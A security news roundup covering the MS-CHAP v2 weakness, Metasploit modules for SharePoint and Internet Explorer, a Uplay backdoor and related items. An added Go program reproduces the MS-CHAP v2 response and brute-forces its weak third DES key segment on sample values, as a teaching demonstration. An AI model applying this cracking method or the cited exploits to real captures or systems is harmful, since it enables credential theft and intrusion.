Security News #0x1A
- Moxie Marlinspike has a great discussion of the MS-CHAP v2 vulnerability he and David Hulton presented at DefCon. MS-CHAP v2 is an authentication protocol (RFC 2759; RFC 2433) developed by Microsoft that still sees significant use in PPTP VPNs and elsewhere. Due to some errors in the protocol, the effective strength of the algorithm is roughly equivalent to that of a single DES pass. They have developed the tool chapcrack, which will locate all of the MS-CHAP v2 sessions in a capture and produce a token that can be submitted to CloudCracker, which will return the corresponding key in under a day.
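To make the "single DES pass" remark concrete, here is an added illustration (my own code, not from Moxie's post or chapcrack) of the response computation from RFC 2759 sections 8.2, 8.5 and 8.6. The 16-byte NT hash is zero-padded to 21 bytes and cut into three 7-byte DES keys that all encrypt the same 8-byte challenge hash. The third key therefore contains only two unknown bytes, so the code below recovers them by trying all 65536 candidates; the remaining two keys each have 56 unknown bits, but since they encrypt the same plaintext, one 2^56 sweep of the DES keyspace tests both at once, which is the weakness the item describes. The NT hash, challenges and user name are constructed sample values, and the key-derivation step from a password (MD4 of the UTF-16 password) is deliberately left out because Go's standard library has no MD4.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// challengeHash implements ChallengeHash() from RFC 2759 section 8.2:
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName), truncated to 8 bytes.
func challengeHash(peerChallenge, authChallenge [16]byte, userName string) [8]byte {
	h := sha1.New()
	h.Write(peerChallenge[:])
	h.Write(authChallenge[:])
	h.Write([]byte(userName))
	var out [8]byte
	copy(out[:], h.Sum(nil)[:8])
	return out
}

// setOddParity sets the low bit of b so that the byte has an odd number of 1 bits,
// the parity convention DES keys use (RFC 2759 section 8.6).
func setOddParity(b byte) byte {
	if bits.OnesCount8(b&0xFE)%2 == 0 {
		return b | 0x01
	}
	return b & 0xFE
}

// expandDESKey spreads a 56-bit (7-byte) key over 8 bytes, 7 key bits per byte,
// and fills the eighth bit of each byte with odd parity.
func expandDESKey(k7 []byte) []byte {
	var k8 [8]byte
	k8[0] = k7[0] >> 1
	k8[1] = ((k7[0] & 0x01) << 6) | (k7[1] >> 2)
	k8[2] = ((k7[1] & 0x03) << 5) | (k7[2] >> 3)
	k8[3] = ((k7[2] & 0x07) << 4) | (k7[3] >> 4)
	k8[4] = ((k7[3] & 0x0F) << 3) | (k7[4] >> 5)
	k8[5] = ((k7[4] & 0x1F) << 2) | (k7[5] >> 6)
	k8[6] = ((k7[5] & 0x3F) << 1) | (k7[6] >> 7)
	k8[7] = k7[6] & 0x7F
	for i := range k8 {
		k8[i] = setOddParity(k8[i] << 1)
	}
	return k8[:]
}

// desEncrypt is DesEncrypt() from RFC 2759 section 8.6: one DES-ECB block
// encryption of clear under the 7-byte key key7.
func desEncrypt(key7 []byte, clear [8]byte) [8]byte {
	block, err := des.NewCipher(expandDESKey(key7))
	if err != nil {
		panic(err) // unreachable: the key is always exactly 8 bytes
	}
	var out [8]byte
	block.Encrypt(out[:], clear[:])
	return out
}

// ntResponse is ChallengeResponse() from RFC 2759 section 8.5: the NT hash is
// zero-padded to 21 bytes and split into three 7-byte DES keys, each of which
// encrypts the same challenge hash. The last key holds only 2 bytes of the hash.
func ntResponse(ntHash [16]byte, chal [8]byte) [24]byte {
	var zPasswordHash [21]byte // 16 hash bytes followed by 5 zero bytes
	copy(zPasswordHash[:], ntHash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		c := desEncrypt(zPasswordHash[7*i:7*i+7], chal)
		copy(resp[8*i:], c[:])
	}
	return resp
}

// recoverThirdKey demonstrates the weak third segment: only hash bytes 14 and 15
// are unknown, so all 65536 candidates are tried against the last response block.
func recoverThirdKey(chal [8]byte, resp [24]byte) ([2]byte, bool) {
	var key7 [7]byte // bytes 2..6 stay zero, exactly as in the real padding
	for cand := 0; cand < 1<<16; cand++ {
		key7[0] = byte(cand >> 8)
		key7[1] = byte(cand)
		if c := desEncrypt(key7[:], chal); bytes.Equal(c[:], resp[16:]) {
			return [2]byte{key7[0], key7[1]}, true
		}
	}
	return [2]byte{}, false
}

func main() {
	// Constructed sample values; a real NT hash would be MD4(UTF-16LE(password)).
	var ntHash [16]byte
	copy(ntHash[:], []byte("0123456789abcdef"))
	var peer, auth [16]byte
	copy(peer[:], []byte("peer-challenge!!"))
	copy(auth[:], []byte("auth-challenge!!"))
	chal := challengeHash(peer, auth, "alice")
	resp := ntResponse(ntHash, chal)
	fmt.Println("NT-Response:", hex.EncodeToString(resp[:]))
	last2, ok := recoverThirdKey(chal, resp)
	fmt.Printf("third key segment recovered: %v, hash bytes 14-15 = %x\n", ok, last2)
	fmt.Println("remaining: keys 1 and 2 share one plaintext, so one 2^56 DES sweep tests both")
}
```

The point for defenders is that no amount of password complexity helps here: the work factor is fixed by the protocol's key splitting, not by the password, which is why the advice in the post is to move PPTP/MS-CHAP v2 deployments to something else rather than to rotate credentials.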
- A privilege escalation hole in the Nvidia Linux driver has been announced on the Full Disclosure mailing list.
- Instructions for how to install ModSecurity for IIS have now been posted to the ModSecurity Reference Manual.
- Jurriaan Bremer has developed a static analysis tool to detect when a program tries to access uninitialized memory.
- Here is a nice post from the Penetration Testing Lab blog for beginners on how to do some simple web application fingerprinting.
- And here is a nice post for budding reverse engineers by R4ndom showing how to patch and modify a binary.
- Dutch Ruppersberger posted to Twitter: "Looking for great college students to intern in my DC office this fall. Call the office at 202-225-3061 for further details. — Dutch Ruppersberger (@Call_Me_Dutch)".
- The next meeting of CharmSec is set for Thursday, August 30 at 7:00, in Fells Point in Baltimore.
- If you use Snort on (or near) Windows, you may be interested in Snort syntax highlighting in Notepad++.
- Metasploit has released a new module to attack Microsoft Office SharePoint Server 2007, resulting in arbitrary code execution as SYSTEM. This attack exploits MS10-104 and has been tested on SharePoint Server 2007 running on Windows Server 2003 SP2.
- While I am thinking of Metasploit, they also released a new module to exploit Internet Explorer via CVE-2012-1876, which was patched by MS12-037. The vulnerability here is in how Internet Explorer handles the span attribute of col elements in a table. The module has been tested on IE 8, both on Windows 7 SP1 and on XP SP3, using ROP.
- There appear to be some problems with the Uplay system installed with Ubisoft games, and it may allow some degree of back door access. See ZDNet’s take and the original post to Full Disclosure that started it all.
- Here is an advanced discussion of how to extract password hashes from suspended virtual machines.